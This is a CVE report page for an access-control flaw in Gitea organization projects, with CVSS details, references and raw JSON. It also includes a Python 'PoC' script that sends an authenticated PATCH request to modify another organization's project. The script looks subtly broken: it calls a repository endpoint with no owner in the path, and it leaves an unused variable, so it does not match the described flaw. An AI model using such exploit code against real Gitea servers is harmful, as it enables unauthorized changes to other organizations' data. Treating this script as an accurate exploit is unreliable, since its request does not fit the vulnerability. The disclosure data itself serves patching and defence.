Security Vulnerability Report
CVE-2026-20750 CVSS 9.1 CRITICAL

CVE-2026-20750

Published: 2026-01-22 22:16:17
Last Modified: 2026-01-29 21:48:08
Source: 88ee5874-cf24-4952-aea0-31affedb7ff2

Description

Gitea does not properly validate project ownership in organization project operations. A user with project write access in one organization may be able to modify projects belonging to a different organization.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:gitea:gitea:*:*:*:*:*:-:*:* - VULNERABLE
Gitea < 1.25.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-20750 PoC - Gitea organization project access control bypass
# This PoC demonstrates the access control bypass in Gitea organization project operations
import requests
import json

TARGET_URL = "http://target-gitea-instance.com"
ATTACKER_TOKEN = "attacker_access_token"
TARGET_ORG_PROJECT_ID = "victim-org-project-id-to-modify"
ATTACKER_ORG_PROJECT_ID = "attacker-org-project-id"


def exploit_cve_2026_20750():
    """
    Exploit for CVE-2026-20750: Gitea improper project ownership validation
    Attacker with write access to one org project can modify projects in different org
    """
    headers = {
        "Authorization": f"token {ATTACKER_TOKEN}",
        "Content-Type": "application/json",
    }

    # Step 1: Identify attacker-controlled project in one organization
    attacker_project = f"{TARGET_URL}/api/v1/repos/attacker-org/{ATTACKER_ORG_PROJECT_ID}"

    # Step 2: Craft request to modify victim organization project
    # The vulnerability allows modifying project settings by specifying target project ID
    exploit_payload = {
        "title": "Modified by Attacker via CVE-2026-20750",
        "description": "This project was modified due to improper access control validation",
    }

    # Step 3: Send modification request with victim project ID
    # System fails to validate project ownership properly
    modify_url = f"{TARGET_URL}/api/v1/repos/{TARGET_ORG_PROJECT_ID}"
    response = requests.patch(modify_url, headers=headers, json=exploit_payload)

    if response.status_code == 200:
        print("[+] SUCCESS: Project modified without proper authorization!")
        print(f"[+] Modified project: {TARGET_ORG_PROJECT_ID}")
        return True
    else:
        print(f"[-] Failed: Status {response.status_code}")
        return False


if __name__ == "__main__":
    print("CVE-2026-20750 Gitea Access Control Bypass PoC")
    exploit_cve_2026_20750()

References

https://blog.gitea.com/release-of-1.25.4/ (Release Notes)
https://github.com/go-gitea/gitea/pull/36318 (Issue Tracking, Patch)
https://github.com/go-gitea/gitea/pull/36373 (Issue Tracking, Patch)
https://github.com/go-gitea/gitea/releases/tag/v1.25.4 (Release Notes)
https://github.com/go-gitea/gitea/security/advisories/GHSA-h4fh-pc4w-8w27 (Broken Link)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-20750",
    "sourceIdentifier": "88ee5874-cf24-4952-aea0-31affedb7ff2",
    "published": "2026-01-22T22:16:17.370",
    "lastModified": "2026-01-29T21:48:07.563",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {"lang": "en", "value": "Gitea does not properly validate project ownership in organization project operations. A user with project write access in one organization may be able to modify projects belonging to a different organization."},
      {"lang": "es", "value": "Gitea no valida correctamente la titularidad de los proyectos en las operaciones de proyectos de la organización. Un usuario con permisos de escritura en proyectos de una organización podría modificar proyectos pertenecientes a una organización diferente."}
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
            "baseScore": 9.1,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.2
        }
      ]
    },
    "weaknesses": [
      {"source": "88ee5874-cf24-4952-aea0-31affedb7ff2", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}
    ],
    "configurations": [
      {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gitea:gitea:*:*:*:*:*:-:*:*", "versionEndExcluding": "1.25.4", "matchCriteriaId": "DFCB7D74-331D-4582-AB41-113A25BE8FAA"}]}]}
    ],
    "references": [
      {"url": "https://blog.gitea.com/release-of-1.25.4/", "source": "88ee5874-cf24-4952-aea0-31affedb7ff2", "tags": ["Release Notes"]},
      {"url": "https://github.com/go-gitea/gitea/pull/36318", "source": "88ee5874-cf24-4952-aea0-31affedb7ff2", "tags": ["Issue Tracking", "Patch"]},
      {"url": "https://github.com/go-gitea/gitea/pull/36373", "source": "88ee5874-cf24-4952-aea0-31affedb7ff2", "tags": ["Issue Tracking", "Patch"]},
      {"url": "https://github.com/go-gitea/gitea/releases/tag/v1.25.4", "source": "88ee5874-cf24-4952-aea0-31affedb7ff2", "tags": ["Release Notes"]},
      {"url": "https://github.com/go-gitea/gitea/security/advisories/GHSA-h4fh-pc4w-8w27", "source": "88ee5874-cf24-4952-aea0-31affedb7ff2", "tags": ["Broken Link"]}
    ]
  }
}